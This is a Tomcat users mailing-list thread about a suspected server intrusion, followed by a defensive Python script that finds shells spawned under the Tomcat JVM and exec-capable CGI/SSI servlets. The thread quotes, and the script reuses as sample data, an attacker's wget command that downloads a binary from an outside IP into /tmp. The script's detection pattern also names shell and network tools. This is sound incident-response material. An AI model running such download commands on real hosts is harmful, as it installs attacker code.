> Date: Wed, 30 Apr 2014 12:35:52 -0300
> Subject: Re: Regarding i think an intrusion
> From: lsantagost...@gmail.com
> To: users@tomcat.apache.org
>
> Hello list,
>
> well my homework is done
>
> Here are the links:
>
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logsfiles: http://pastebin.com/j3tip4ij
MG>Please paste the contents of the following log files on Pastebin and send us the link:
-rw-rw-r-- 1 tomcat tomcat 5.0K Apr 30 05:38 localhost.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat 5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat    0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat 3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat  43M Apr 30 12:18 portal-ht.log
-rw-rw-r-- 1 tomcat tomcat 583K Apr 30 10:09 portal-mh.log
-rw-rw-r-- 1 tomcat tomcat  58M Apr 30 12:19 portal-pdi.log
-rw-rw-r-- 1 tomcat tomcat 3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat 3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat 591K Apr 30 12:18 RT_access_log.2014-04-30.txt
MG>Kind regards from the USA
>
> Note that logsfiles are not the log files themselves but only an ls -lah (just
> for you to see the log sizes)
>
> A little more about the infrastructure I've mounted; I'll do some ASCII art.
>
>
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
>
>
> Apache(2) is serving static content so haproxy(1) at the first level does
> http round robin balancing
> Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
> using mod_jk(3)
> Tomcat(5) are the main app servers (the ones that get intruded), which use
> tomcat(7) (solr service) via haproxy(6) using an L4 connection.
>
> Versions:
>
> Apache: 2.2.17
> mod_jk: 1.2.31
> haproxy: 1.4.22
> Tomcat: 7.0.53
> Java: 1.6.0.41
>
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> java version "1.6.0_41"
> Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
>
> OS: CentOS 5.8 64 bit
>
> [root@arcbaappvrt05 tomcat]# uname -a
> Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> CentOS release 5.8 (Final)
> [root@arcbaappvrt05 tomcat]#
>
> For now I haven't seen that the squid process was launched, so I couldn't do a
> dump
>
> Let me know if you need more information.
>
> BTW, pastebin links will work for one week.
>
> Kind regards, yours
>
> Regards.-
> Leonardo Santagostini
>
> <http://ar.linkedin.com/in/santagostini>
>
>
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>:
>
> > Ok, I will do the following:
> >
> > 1) thread dump of running tomcat instance
> > 2) Pastebin the running tomcat config
> >
> > I think at mid day I will have all the info.
> >
> > Thanks all for replying to me and for all the responses.
> >
> > Regards, Leonardo
> >
> > Regards.-
> > Leonardo Santagostini
> >
> > <http://ar.linkedin.com/in/santagostini>
> >
> >
> > 2014-04-30 10:55 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net>:
> >
> >> Konstantin,
> >>
> >> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> >> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini <lsantagost...@gmail.com>:
> >> >> Hello Dan,
> >> >>
> >> >> Nope, the attacker is executing locally the following
> >> >>
> >> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
> >> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >> >>
> >> >> And then it launches squid, which tries to connect via ssh to various
> >> >> places.
> >> >>
> >> >> Right now it's time to leave the office, but in a few hours I will
> >> >> paste in pastebin access logs, config files, wherever you tell
> >> >> me.
> >> >>
> >> >> This is my pstree
> >> >>
> >> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
> >> >> init─┬─atd
> >> >>      ├─java─┬─sh───wget
> >> >>      │      └─263*[{java}]
> >> >
> >> > sh launched by tomcat's java?
> >>
> >> Yes: please verify that it's the JVM running Tomcat, and not just any
> >> JVM process.
> >>
> >> > Take a thread dump:
> >> > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >> >
> >> > It shall show the stack trace of the thread that launched the external
> >> > process.
> >>
> >> +1
> >>
> >> The only things that ship with Tomcat that call Process.exec() are the
> >> CGI servlet and SSI, both of which are disabled by default. So, either
> >> you have an insecure CGI/SSI configuration, your web application has a
> >> vulnerability, or you have deployed something like the Manager
> >> application and improperly secured it.
> >>
> >> A classic example of such an intrusion might be that someone got a
> >> foothold elsewhere into your network, and the Manager web application
> >> is not properly secured with a password, etc.
> >>
> >> - -chris
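The thread above raises two checks a responder would want to script rather than eyeball: Konstantin's and Chris's question of whether the shell was really spawned by the JVM that runs Tomcat (not just any Java process), and Chris's point that the CGI servlet and SSI are the only stock Tomcat components that call Process.exec(). The following Python is an added example written for this page; it is not code from the thread or from the Tomcat project. It parses a constructed `ps -ef` excerpt (PID 4711 for the Tomcat JVM, the `/opt/tomcat` paths and the `sshd` line are assumptions; the `sh /tmp/4.sh` and `wget` lines reuse the PIDs and commands posted in the thread, re-parented under the java PID as the pstree showed) and a constructed web.xml in which the CGI servlet has been uncommented and mapped while the SSI servlet is declared but unmapped.

```python
"""Added example (not from the thread): (1) list shells/downloaders spawned
below the JVM that runs Tomcat, identified by its Bootstrap class; (2) report
which CGI/SSI components in a web.xml are both declared and mapped, i.e. can
actually be reached and call Process.exec(). All inputs are constructed."""
import re
import xml.etree.ElementTree as ET

# Constructed ps -ef excerpt; the Tomcat JVM PID 4711 and /opt/tomcat are assumed.
PS_OUTPUT = """\
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Apr20 ?        00:00:02 init [3]
tomcat    4711     1  0 Apr27 ?        01:12:33 /usr/java/default/bin/java -classpath /opt/tomcat/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap start
tomcat    8882  4711  0 Apr27 ?        00:00:00 sh /tmp/4.sh
tomcat    8893  8882  0 Apr27 ?        00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
root      2201     1  0 Apr20 ?        00:00:00 /usr/sbin/sshd
"""

# Program names a servlet container has no business spawning.
SPAWN_PATTERN = re.compile(r"^(sh|bash|dash|ksh|wget|curl|perl|python|nc|ncat)$")

def parse_ps(text):
    """Map pid -> {uid, ppid, cmd} from `ps -ef` style output."""
    procs = {}
    for line in text.splitlines():
        parts = line.split(None, 7)
        if len(parts) < 8 or not parts[1].isdigit():
            continue  # header or truncated line
        uid, pid, ppid, _c, _stime, _tty, _time, cmd = parts
        procs[int(pid)] = {"uid": uid, "ppid": int(ppid), "cmd": cmd}
    return procs

def tomcat_jvm_pids(procs):
    """Only JVMs started through Tomcat's Bootstrap class count (Chris's caveat)."""
    return [pid for pid, p in procs.items()
            if "org.apache.catalina.startup.Bootstrap" in p["cmd"]]

def descendants(procs, root):
    """All pids below `root` in the process tree, depth first."""
    found, stack = [], [root]
    while stack:
        cur = stack.pop()
        for pid, p in procs.items():
            if p["ppid"] == cur:
                found.append(pid)
                stack.append(pid)
    return found

def suspicious_children(procs):
    """(pid, cmd, chain-from-jvm) for every shell/downloader under a Tomcat JVM."""
    findings = []
    for jvm in tomcat_jvm_pids(procs):
        for pid in descendants(procs, jvm):
            prog = procs[pid]["cmd"].split()[0].rsplit("/", 1)[-1]
            if SPAWN_PATTERN.match(prog):
                chain = [pid]
                while chain[-1] != jvm:  # walk back up to the JVM
                    chain.append(procs[chain[-1]]["ppid"])
                findings.append((pid, procs[pid]["cmd"], chain[::-1]))
    return findings

# The stock Tomcat classes that execute external processes.
EXEC_CLASSES = {
    "org.apache.catalina.servlets.CGIServlet": "CGI servlet",
    "org.apache.catalina.ssi.SSIServlet": "SSI servlet",
    "org.apache.catalina.ssi.SSIFilter": "SSI filter",
}

# Constructed web.xml: CGI uncommented and mapped, SSI declared but unmapped.
WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet><servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class></servlet>
  <servlet><servlet-name>cgi</servlet-name>
    <servlet-class>org.apache.catalina.servlets.CGIServlet</servlet-class></servlet>
  <servlet><servlet-name>ssi</servlet-name>
    <servlet-class>org.apache.catalina.ssi.SSIServlet</servlet-class></servlet>
  <servlet-mapping><servlet-name>default</servlet-name><url-pattern>/</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>cgi</servlet-name><url-pattern>/cgi-bin/*</url-pattern></servlet-mapping>
</web-app>
"""

def exec_capable_components(web_xml):
    """Names of CGI/SSI components that are both declared and mapped."""
    root = ET.fromstring(web_xml)
    for el in root.iter():  # drop the namespace so plain tag names match
        el.tag = el.tag.rsplit("}", 1)[-1]
    declared, mapped = {}, set()
    for kind in ("servlet", "filter"):
        for el in root.findall(kind):
            cls = el.findtext(f"{kind}-class")
            if cls in EXEC_CLASSES:
                declared[el.findtext(f"{kind}-name")] = EXEC_CLASSES[cls]
        for el in root.findall(f"{kind}-mapping"):
            mapped.add(el.findtext(f"{kind}-name"))
    return sorted(v for k, v in declared.items() if k in mapped)

if __name__ == "__main__":
    for pid, cmd, chain in suspicious_children(parse_ps(PS_OUTPUT)):
        print(f"pid {pid}: {cmd}  (chain {' -> '.join(map(str, chain))})")
    print("exec-capable components:", exec_capable_components(WEB_XML))
```

Against the sample data the first check reports PIDs 8882 and 8893 with the chain 4711 -> 8882 -> 8893, which is the evidence the thread asks for before reading the thread dump; the second reports only "CGI servlet", because a declared-but-unmapped SSI servlet cannot be reached by a request. On a live host, feed `ps -ef` output and the deployed `conf/web.xml` (and each webapp's `WEB-INF/web.xml`) into the same functions.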